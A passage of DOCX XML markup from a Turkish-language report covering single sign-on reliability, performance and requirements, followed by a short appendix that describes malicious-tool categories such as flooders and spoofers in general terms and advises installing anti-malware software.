          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">3. Masaüstü özelleştirmesini sağlayan API hizmetleri var mı? </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="708" w:firstLine="60"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00000E7D">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>4. Bu API'ler, yerleşik güvenlik bilgi veritabanına "arka kapı" erişimi sağlayarak genel sistem bütünlüğünden ödün vermeden bunu kolaylaştırıyor mu?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="708" w:firstLine="60"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="Balk1"/>
      </w:pPr>
      <w:bookmarkStart w:id="96" w:name="_Toc9978724"/>
      <w:bookmarkStart w:id="97" w:name="_Toc9979206"/>
      <w:r w:rsidRPr="00406002">
        <w:t>2.18. Güvenilirlik ve Performans</w:t>
      </w:r>
      <w:bookmarkEnd w:id="96"/>
      <w:bookmarkEnd w:id="97"/>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="708" w:firstLine="60"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="708" w:firstLine="60"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00406002">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Bir SSO ürününün, zorunlu olarak, son kullanıcılar ile işlerini yapmak için erişmeleri gereken uygulamalar arasında konumlandırılması nedeniyle, işletme içinde çok yüksek bir görünürlük vardır ve beklenmeyen güvenilirlik veya performans sorunlarının ciddi sonuçları olabilir. Bu sorun doğrudan ürünü haklı çıkarmak için yapılan orijinal iş davasına işaret ediyor. Güvenilirlik ve performans ile ilgili endişeler genellikle bir yazılımın diğerine (“başka bir katman”) eklenmesi, SSO ve dokunduğu diğer erişim kontrol programları arasındaki arayüzler, bu etkileşimlerin karmaşıklığı vb. endişe, bu yeni katmanın ortaya çıkardığı gecikme süresidir. Açılıştan giriş ekranına kadar geçen süre yıllar içinde istikrarlı bir şekilde artmıştır ve SSO'nun eklenmesi yine bunu artırabilir. Bu kullanıcı hayal kırıklığını daha da arttırabilir. Güvenilirlik sorunu, SSO ile diğer güvenlik cephesi arasındaki etkileşim dikkate alındığında ortaya çıkar. Arayüzlerin karmaşıklığı, çok büyükse, artan servis sorunlarına yol açabilir; Kod ne kadar karmaşık olursa, başarısızlık o kadar sık ​​sonuçlanır. Bu, şifreler ve senkronizasyon kaybetme, güvenilir şekilde geçmeme veya ayrıcalık atama dosyalarının aynı şekilde veya hızlı bir şekilde güncellenmemesi gibi değişikliklerle kendini gösterebilir. Bunlar gibi sorunlar, SSO'nun gerçekten de olsa iyi bir fikir olup olmadığını sorguluyor. Karmaşık kod bakımı masraflıdır ve SSO karmaşık değilse hiçbir şey değildir. En iyi programlama bile düzgün yapılmazsa etkisiz hale getirilebilir veya daha da kötüsü üretken olabilir. Bir SSO ürünü, özellik bakımından zengin karmaşıklığından dolayı bu türden daha fazla dikkat gerektirir. SSO'nun amacının erişim kontrolü olduğu ve bu bağlamda diğer tüm erişim kontrol sistemlerinde olduğu gibi aynı gizlilik, bütünlük ve erişilebilirlik hedeflerine ulaşıldığı açıktır. SSO ürünleri daha fazla işlevsellik sağlamak üzere tasarlanmıştır, ancak bu şekilde kullanılması, kurulu oldukları ortamları olumsuz yönde etkileyebilir. Bunu yaparlarsa, etkiler büyük olasılıkla güvenilirlik, bütünlük ve performans faktörlerine karşı görünecektir; ve eğer yeterince büyükse, etkiler SSO'nun başka bir yerde sağladığı faydaları olumsuz etkileyecektir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00406002" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="708" w:firstLine="60"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="Balk1"/>
      </w:pPr>
      <w:bookmarkStart w:id="98" w:name="_Toc9978725"/>
      <w:bookmarkStart w:id="99" w:name="_Toc9979207"/>
      <w:r w:rsidRPr="00406002">
        <w:t>2.19. Gereksinimler</w:t>
      </w:r>
      <w:bookmarkEnd w:id="98"/>
      <w:bookmarkEnd w:id="99"/>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="708" w:firstLine="60"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="708" w:firstLine="60"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00406002">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Bu bölüm, bir SSO uygulamasında görmek istedikleriyle ilgili olarak Georgia Area RACF Users Group'un (GARUG) bir araya getirdiği bir gereksinim belgesinin içeriğini sunmaktadır.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="708" w:firstLine="60"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="Balk1"/>
      </w:pPr>
      <w:bookmarkStart w:id="100" w:name="_Toc9978726"/>
      <w:bookmarkStart w:id="101" w:name="_Toc9979208"/>
      <w:r w:rsidRPr="00406002">
        <w:t>2.20. Hedefler</w:t>
      </w:r>
      <w:bookmarkEnd w:id="100"/>
      <w:bookmarkEnd w:id="101"/>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="708" w:firstLine="60"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00406002" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="708" w:firstLine="60"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00406002">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Bu listenin odağı, güvenilir bir tek oturum açma ve güvenlik yönetimi ürününün tasarımı ve geliştirilmesi için bir dizi işlevsel gereksinim sunmaktır. Bunun, güvenlik uygulayıcıları tarafından incelenebilecekleri güvenlik ürünlerinin etkinliğini belirlemek için kullanılması niyetindedir. Deneyimli güvenlik kullanıcılarının çok platformlu sistemlerin başarılı bir şekilde korunmasında çok önemli olduğunu düşündükleri birçok gereksinimi içerir. Ayrıca, şu anda hemen bulunamayacak birkaç işlevsel gereksinim de içerir. Bu listenin bir araştırma ve geliştirme aracı olarak kullanılabileceğini, çünkü gereksinimlerin gerçek dünyadaki sorunlara yanıt olarak deneyimli, çalışan güvenlik uygulayıcıları tarafından benimsendiğini söyledi.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="708" w:firstLine="60"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00406002">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Bu konu, profesyonel güvenlik camiasındaki birçok kişi ve bu listeyi cevap olarak hazırlayan GARUG üyeleri tarafından öne çıkarıldı. Bu, güvenlik ürünleri arayışında kullanılacak bir yemek kitabı değildir. Birçok yönden, bu liste vizyonerdir; bu, burada belirtilen gereksinimlerin çoğunun mevcut olmadığını söyler. Ancak sadece şu anda var olmadıkları için şimdi dahil olmalarını engellemiyor. Bir üyenin belirttiği gibi, “İstemediğimiz takdirde, alamayacağız”.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="708" w:firstLine="60"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="708" w:firstLine="60"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="Balk1"/>
      </w:pPr>
      <w:bookmarkStart w:id="102" w:name="_Toc9978727"/>
      <w:bookmarkStart w:id="103" w:name="_Toc9979209"/>
      <w:r w:rsidRPr="00406002">
        <w:t>2.21. İşlevsel gereksinimler</w:t>
      </w:r>
      <w:bookmarkEnd w:id="102"/>
      <w:bookmarkEnd w:id="103"/>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="708" w:firstLine="60"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="708" w:firstLine="60"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00406002">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Aşağıdakiler, piyasadaki ideal bir güvenlik ürününün işlevsel gereksinimlerinin bir listesidir. Listede, güvenlik uygulayıcılarının gelecekteki ürünlere dahil edilmesini görmek istedikleri birçok özellik de var. Gereksinimler dört ana kategoriye ayrılmıştır: güvenlik yönetimi yönetimi, tanımlanması ve yetkilendirilmesi, erişim kontrolü ve veri bütünlüğü / gizliliği / şifrelemesi. Her kategoride gereksinimler en kritik ve en kritik sıraya göre listelenmiştir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="708" w:firstLine="60"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="0024176B" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="Balk1"/>
      </w:pPr>
      <w:bookmarkStart w:id="104" w:name="_Toc9978728"/>
      <w:bookmarkStart w:id="105" w:name="_Toc9979210"/>
      <w:r>
        <w:t>3.</w:t>
      </w:r>
      <w:r w:rsidRPr="0024176B">
        <w:t>Ek Konu : Kötü amaçlı yazılım saldırısı</w:t>
      </w:r>
      <w:bookmarkEnd w:id="104"/>
      <w:bookmarkEnd w:id="105"/>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="0024176B">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Kötü Amaçlı Araçlar; otomatik olarak virüs, solucan veya Trojan oluşturmak, uzak sunuculara DoS saldırıları düzenlemek, başka bilgisayarlara saldırıda bulunmak ve benzeri işlemler için tasarlanmış kötü amaçlı yazılım programlarıdır.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="Balk1"/>
      </w:pPr>
      <w:bookmarkStart w:id="106" w:name="_Toc9978729"/>
      <w:bookmarkStart w:id="107" w:name="_Toc9979211"/>
      <w:r w:rsidRPr="0024176B">
        <w:lastRenderedPageBreak/>
        <w:t>3.1.</w:t>
      </w:r>
      <w:r w:rsidRPr="0024176B">
        <w:rPr>
          <w:rFonts w:hAnsi="Trebuchet MS"/>
          <w:color w:val="5B9BD5" w:themeColor="accent1"/>
          <w:kern w:val="24"/>
          <w:sz w:val="64"/>
          <w:szCs w:val="64"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0024176B">
        <w:t>Kötü Amaçlı Araçlar Sizi Nasıl Etkileyebilir?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="106"/>
      <w:bookmarkEnd w:id="107"/>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="0024176B" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0024176B">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Kötü Amaçlı Araçlar alt sınıfındaki kötü amaçlı yazılımlar, virüslerin, solucanların ve Truva atlarının aksine çalıştıkları bilgisayara doğrudan bir tehdit oluşturmaz ve programın kötü amaçlı yükü yalnızca kullanıcının doğrudan emriyle bırakılır.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="0024176B" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0024176B">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Constructor : Constructor programları, yeni virüsler, solucanlar ve Truva atları oluşturacak şekilde tasarlanmıştır. Kötü amaçlı program kaynak kodu, nesne modülleri ve/veya kötü amaçlı dosyalar oluşturabilirler.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="0024176B" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0024176B">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>DoS :Bu programlar, bir kurban bilgisayara karşı Hizmet Reddi (DoS) saldırıları düzenleyecek şekilde tasarlanmıştır. Programlar, hedeflenen kurban bilgisayara çeşitli istekler gönderir ve bilgisayarın tüm istekleri işleyecek kadar kaynağının bulunmaması halinde hizmet reddi durumu oluşur.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0024176B">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Email-Flooder :Spam gönderenler, bazı durumlarda bu programları e-posta kanallarını anlamsız mesajlarla doldurmak için kullanır.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00C21E3C" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C21E3C">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Flooder : Flooder programları, spam gönderenler tarafından bazı durumlarda IRC (İnternet Üzerinden Sohbet) gibi diğer ağ kanallarını doldurmak için kullanılır.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00C21E3C" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C21E3C">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>IM-Flooder : Spam gönderenler bazen bu programları kullanarak ICQ, MSN Messenger, AOL Instant Messenger, Yahoo Pager, Skype ve benzeri anlık mesajlaşma kanallarını anlamsız mesajlarla doldurur.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00C21E3C" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C21E3C">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>SMS-Flooder : SMS-Flooder programları, spam gönderenler tarafından bazen kısa mesaj kanallarını gereksiz mesajlarla doldurmak amacıyla kullanılır.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00C21E3C" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C21E3C">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>HackTool : Bu programlar, izin verilen sistem ziyaretçileri listesine yeni kullanıcılar eklemek, ayrıca sistem günlüklerindeki bilgileri silerek kötü amaçlı kullanıcının sistemdeki varlığını gizlemek için kullanılır. Kötü amaçlı kullanıcılar yerel veya uzak bilgisayarlara yönelik saldırılar düzenlerken HackTool programlarından yararlanır.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00C21E3C" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C21E3C">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Hoax : Hoax programları bilgisayarınıza zarar vermez. Bunun yerine zararın oluştuğunu veya oluşacağını bildiren mesajlar gönderir ya da aslında var olmayan bir tehdit hakkında uyarılarda bulunur.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00C21E3C" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C21E3C">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Spoofer : Spoofer programları, mesaj veya ağ istekleri gönderen tarafın adresinin yerini alır. Bunlar, alıcının mesajı gönderenin kimliğini belirlemesini engellemek gibi çeşitli amaçlarla kullanılır.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C21E3C">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>VirTool :Bu programlar, diğer kötü amaçlı programları değiştirmek ve antivirüs çözümünün kötü amaçlı yazılımı algılamasını engellemek için kullanılabilir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="Balk1"/>
      </w:pPr>
      <w:bookmarkStart w:id="108" w:name="_Toc9978730"/>
      <w:bookmarkStart w:id="109" w:name="_Toc9979212"/>
      <w:r w:rsidRPr="00C21E3C">
        <w:t>3.2.Kötü Amaçlı Araçlara Karşı Korunma</w:t>
      </w:r>
      <w:bookmarkEnd w:id="108"/>
      <w:bookmarkEnd w:id="109"/>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00C21E3C" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C21E3C">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Cihazlarınıza bir kötü amaçlı yazılımdan koruma yazılımı yüklemeniz ve bu yazılımı bilgisayarınızda sürekli olarak bulundurmanız büyük önem taşır. Kaspersky Lab, ödüllü internet güvenliği teknolojileri geliştirmiştir ve şu cihazları koruyabilecek ürünler sunar:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00C21E3C" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C21E3C">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Windows PC'ler</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00C21E3C" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C21E3C">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Linux bilgisayarlar</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00C21E3C" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C21E3C">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Apple Mac bilgisayarlar</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00C21E3C" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C21E3C">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Akıllı telefonlar</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C21E3C">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Tabletler</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="Balk1"/>
      </w:pPr>
      <w:bookmarkStart w:id="110" w:name="_Toc9978731"/>
      <w:bookmarkStart w:id="111" w:name="_Toc9979213"/>
      <w:r w:rsidRPr="00C21E3C">
        <w:t>4.Kaynakça</w:t>
      </w:r>
      <w:bookmarkEnd w:id="110"/>
      <w:bookmarkEnd w:id="111"/>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00C21E3C" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="708"/>
        <w:rPr>
